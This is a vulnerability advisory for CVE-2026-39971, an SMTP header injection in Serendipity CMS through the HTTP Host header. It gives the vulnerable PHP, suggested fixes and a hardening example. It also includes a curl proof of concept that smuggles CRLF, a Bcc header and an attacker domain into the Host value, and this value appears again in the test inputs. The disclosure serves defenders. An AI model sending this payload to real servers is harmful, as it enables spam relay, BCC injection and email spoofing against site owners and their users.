CVE-2026-39971

Severity: HIGH (CVSS 3.1 base score 7.2)
2026-04-14 | https://github.com/s9y/Serendipity | GHSA-458g-q4fh-mj6r

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Lifecycle Timeline

1. Analysis Generated: Apr 15, 2026 - 01:09 (vuln.today)

Description (NVD)

Summary

Serendipity inserts $_SERVER['HTTP_HOST'] directly into the Message-ID SMTP header without any validation beyond CRLF stripping. An attacker who can control the Host header during an email-triggering action can inject arbitrary SMTP headers into outgoing emails, enabling spam relay, BCC injection, and email spoofing.

Details

In include/functions.inc.php:548:

```php
$maildata['headers'][] = 'Message-ID: <'
    . bin2hex(random_bytes(16))
    . '@' . $_SERVER['HTTP_HOST']  // ← unsanitized, attacker-controlled
    . '>';
```

The existing sanitization function only blocks \r\n and URL-encoded variants:

```php
// Rejects only CR, LF and their URL-encoded forms; every other byte passes.
function serendipity_isResponseClean($d) {
    return (strpos($d, "\r") === false && strpos($d, "\n") === false
        && stripos($d, "%0A") === false && stripos($d, "%0D") === false);
}
```

Critically, serendipity_isResponseClean() is not even called on HTTP_HOST before embedding it into the mail headers - making this exploitable with any character that SMTP interprets as a header delimiter.

Email is triggered by actions such as:

  • New comment notifications to blog owner
  • Comment subscription notifications to subscribers
  • Password reset emails (if configured)

PoC

```bash
# Trigger comment notification email with injected header
curl -s -X POST \
  -H "Host: attacker.com>\r\nBcc: [email protected]\r\nX-Injected:" \
  -d "serendipity[comment]=test&serendipity[name]=hacker&serendipity[email][email protected]&serendipity[entry_id]=1" \
  http://[TARGET]/comment.php
```

Resulting malicious Message-ID header in outgoing email:

```text
Message-ID: <[email protected]>
Bcc: [email protected]
X-Injected: >
```

Impact

An attacker can control the domain portion of the Message-ID header in all outgoing emails sent by Serendipity (comment notifications, subscriptions). This enables:

  • Identity spoofing - emails appear to originate from attacker-controlled domain
  • Reply hijacking - some mail clients use Message-ID for threading, pointing replies toward attacker infrastructure
  • Email reputation abuse - attacker's domain embedded in legitimate mail headers

Suggested Fix

Sanitize HTTP_HOST before embedding in mail headers, and restrict to valid hostname characters only:

```php
// Keep only the host part (this also drops any :port), then strip every byte
// outside the hostname alphabet. Note: parse_url() returns false/null for
// malformed input, leaving $safe_host empty; fall back to a configured
// hostname in that case rather than emitting "@>".
$safe_host = preg_replace('/[^a-zA-Z0-9.\-]/', '',
    (string) parse_url('http://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST)
);
$maildata['headers'][] = 'Message-ID: <'
    . bin2hex(random_bytes(16))
    . '@' . $safe_host
    . '>';
```
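
A stricter variant, added here as an example and not part of the advisory or of Serendipity's code: the Message-ID domain comes from the blog's configured host, and the request's Host header is used only when it matches that host. The $baseURL argument is a hypothetical stand-in for the configured base URL; the inputs at the bottom are constructed, with the PoC's Host value beside a legitimate one.

```php
<?php
// Added example, not Serendipity's own code: take the Message-ID domain from
// the configured blog host, and accept the request's Host header only when
// it matches that host. $baseURL stands in for the blog's configured base URL.

// Return a hostname safe to embed in a header, or null if the value is not a
// plain hostname (the PoC's '>' and CRLF bytes fail this check).
function mailsafe_hostname(?string $candidate): ?string
{
    if ($candidate === null || $candidate === '') {
        return null;
    }
    $host = preg_replace('/:\d+$/', '', $candidate);      // drop an optional :port
    if (!preg_match('/^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$/', $host)) {
        return null;
    }
    return $host;
}

// Build the Message-ID header so that a hostile Host header can never reach it.
function build_message_id_header(array $server, string $baseURL): string
{
    $parsed     = parse_url($baseURL, PHP_URL_HOST);
    $configured = mailsafe_hostname(is_string($parsed) ? $parsed : null);
    $requested  = mailsafe_hostname($server['HTTP_HOST'] ?? null);

    if ($requested !== null && $configured !== null
        && strcasecmp($requested, $configured) === 0) {
        $domain = $requested;                 // Host header matches configuration
    } else {
        $domain = $configured ?? 'localhost.invalid';  // never trust the request
    }
    return 'Message-ID: <' . bin2hex(random_bytes(16)) . '@' . $domain . '>';
}

// Constructed inputs: the advisory's PoC Host value beside a legitimate one.
$hostile = ['HTTP_HOST' => "attacker.example>\r\nBcc: victim@example.org\r\nX-Injected:"];
$benign  = ['HTTP_HOST' => 'blog.example.org'];

foreach ([$hostile, $benign] as $srv) {
    $header = build_message_id_header($srv, 'https://blog.example.org/');
    // Either way the result is one line ending in the configured domain.
    if (strpbrk($header, "\r\n") !== false || !str_ends_with($header, '@blog.example.org>')) {
        throw new RuntimeException('unsafe Message-ID: ' . $header);
    }
    echo $header, PHP_EOL;
}
```

Requires PHP 8.0 or later for str_ends_with(); the same check can be done with substr_compare() on older releases.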

Analysis (AI)

SMTP header injection in Serendipity CMS allows remote unauthenticated attackers to inject arbitrary email headers via malicious Host header during email-triggering operations (comments, subscriptions, password resets). The unsanitized $_SERVER['HTTP_HOST'] value is embedded directly into Message-ID headers without validation, enabling BCC injection, email spoofing, and reply hijacking. …


Remediation (AI)

Within 24 hours: Identify all Serendipity CMS instances in your environment and document versions and external-facing exposure. Within 7 days: Implement input validation/sanitization on $_SERVER['HTTP_HOST'] values and restrict Host header acceptance to known domains via web server configuration (Apache/Nginx allowlist); disable or restrict comment and password-reset features if not critical. …



CVE-2026-39971 vulnerability details – vuln.today
